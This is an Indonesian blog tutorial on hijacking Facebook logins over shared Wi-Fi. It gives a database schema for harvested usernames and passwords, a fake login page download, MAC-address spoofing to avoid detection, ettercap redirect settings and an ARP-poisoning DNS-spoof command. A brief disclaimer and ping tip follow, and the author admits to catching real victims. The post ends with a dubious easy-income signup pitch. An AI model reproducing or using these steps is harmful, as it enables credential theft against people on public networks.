cara hack facebook dalam satu jarigan dan cara mengatasinya - arminaven

amankah berfacebook ria dengan menggunakan jaringan public seperti hotspot gratisan?? demo video dibawah ini mungkin bisa menjawab pertanyaan itu.

kali ini arminaven akan berbagi pengetahuan tentang hacking facebook dalam satu jaringan. sebelumnya tutorial ini arminaven paparkan hanyalah untuk pengetahuan semata, agar sobat arminaven lebih teliti dan waspada dalam menggunakan jaringan public dalam berinternet.

untuk peralatan yang diperlukan adalah operating system Backtrack (kebetulan arminaven menggunakan masih yang versi R1). untuk versi yang diatasnya tentu lebih baik.

selanjutnya tool yang diperlukan dalam backtrack adalah apache, mysql, ettercap. arminaven rasa cuma itu saja, upppssss...ada yang terlupakan, sobat arminaven juga membutuhkan fake login facebook yang bisa sobat download dibawah.

kita beranjak ke tahap hacking facebook yang bisa dibilang menggunakan metode spoof DNS, yahhhh kalo menurut arminaven penjelasannya begini, kita membuat IP facebook menjadi IP laptop kita, sehingga saat victim mengakses facebook sebenarnya dia mengakses IP kita, dan tentunya kita tinggal panen email dan password victim dong...

kembali ke permasalahan diatas, untuk mensinkronkan database fake facebook kita dengan fake facebook yang kita buat, maka perlu dibuat database seperti berikut ini:

sebelumnya aktifkan dulu apaceh dan mysql sobat. cara mengaktifkannya bisa lihat di demo videonya ya,,,,capek nulisnya :).

begini struktur database fake facebook kita:

create database arminaven;
use arminaven;
create table verizon(key1 VARCHAR(64), key2 VARCHAR(64));
create table facebook(username VARCHAR(64), password VARCHAR(64));

jadi dalam satu database ada dua tabel, biar gak ribet lho, selanjutnya kita mulai lakukan langkah berikut ini:

buka konsole (belum tau caranya yaaa??, lihat aja video arminaven dibawah) dan ketik satu persatu kode berikut ini

ifconfig

ifconfig wlan0 down

macchanger --mac 00:22:44:66:88:00 wlan0

ifconfig wlan0 up

pengetikan kode diatas cuma optional aja, biar gak ketahua kita pelakunya :D. jadi kalo cuma untuk testing doang ya gak usah capek capek mengetiknya tapi langsung ke langkah dibawah ini:

masukan file facebook palsu ke file system var/www (file anda)

lalu buka konsole lagi dan ketik kode berikut

gedit /etc/etter.conf

setelah terbuka, langsung hilangkan tanda # pada kata berikut ini:

 #---------------
# Linux
#---------------

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

hingga jadinya seperti berikut ini:

#---------------
# Linux
#---------------

# if you use ipchains:
redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
 

jangan lupa di save yaaa...

selanjutnya ketik di konsole kode berikut ini untuk mengatur ettercap dan mengalihkan facebook ke IP kita:

gedit /usr/local/share/ettercap/etter.dns

isi dengan IP sobat arminaven disana, lebih jelasnya lihat aja videonya, dah gitu jangan lupa di save dan tutup. sekarang coba kita test fake facebook kita apakah sudah berfungsi atau tidak, caranya: buka browser sobat arminaven dan ketik IP sobat, lalu enter. jika kelihatan halaman facebooknya berati dah jalan tu, tapi jika belum, hapus dulu file selain fake facebook yang ada di folder var/www agar tidak bentrok. jika sudah dikerjakan sesuai langkah langkahnya. coba cek database sobat arminaven yang sebelumnya sudah melakukan input di fake facebook. jika inputannya berhasil maka kita lanjutkan ke tahap inti dari hacking ini. kita spoof dulu DNS facebook dengan mengetik kode berikut ini:

ettercap -Tqi wlan0 -M arp // // -P dns_spoof

silahkan perhatikan video arminaven untuk melihat tanda sudah ada victim yang kena hack.

GAME OVER

perhatian !!

arminaven tidak mengajarkan cara ilegal menggunakan akun orang lain. tapi arminaven membuat tutorial ini agar sobat berhati hati dalam menggunakan jaringan public. jika sobat tidak ingin jadi korban, sebelumnya mengunjungi website seperti facebook, yahoomail dan lainnya, cobalah dengan melakukan ping terlebih dahulu, berikut caranya :

ping www.namasitus.com

contoh: ping www.facebook.com

jika IP yang ada bukan IP asli facebook, maka jangan lanjutkan mengakses facebook, jika keburu sudah mengakses, segera ganti password sobat sebelum di salah gunakan attacker. ini salah satu tips mengatasi hack facebook

semoga bermanfaat.


 

link download fake facebook

kepada korban yang kena, itu diluar rencana arminaven. saat arminaven bereksperimen, kebetulan anda dan saya berada dalam jaringan yang sama. silahkan ganti password akun anda, saya tidak menyalah gunakan akun anda. harap dimaklumi

peace...!!

 

Bisnis Investasi Online

Sobat punya blog ??
jangan biarkan menganggur hanya untuk tempat sharing semata
maksimalkan dengan melakukan bisnis online.
Arminaven mengundang sobat untuk mendapatkan usaha sampingan lewat blog

Penghasilan yang didapatkan Rp 50.000 s/d 1juta perhari dari INTERNET !
mari gabung sekarang
free member juga dapat komisi
semoga sukses
Nama :
Email :


segera validasi email sobat dan ikuti langkah - langkah selanjutnya
terima kasih telah bergabung
Salam Arminaven

2 Responses to "cara hack facebook dalam satu jarigan dan cara mengatasinya - arminaven"

  1. digunakan di windows bisa gk gan

    BalasHapus
  2. gak bisa gan, karena toolnya gak ada di windows
    terima kasih telah berkunjung

    BalasHapus

Peraturan Berkomentar :
1. Tidak mencantumkan link live
2. Komentar dengan anonym tidak terlalu kami layani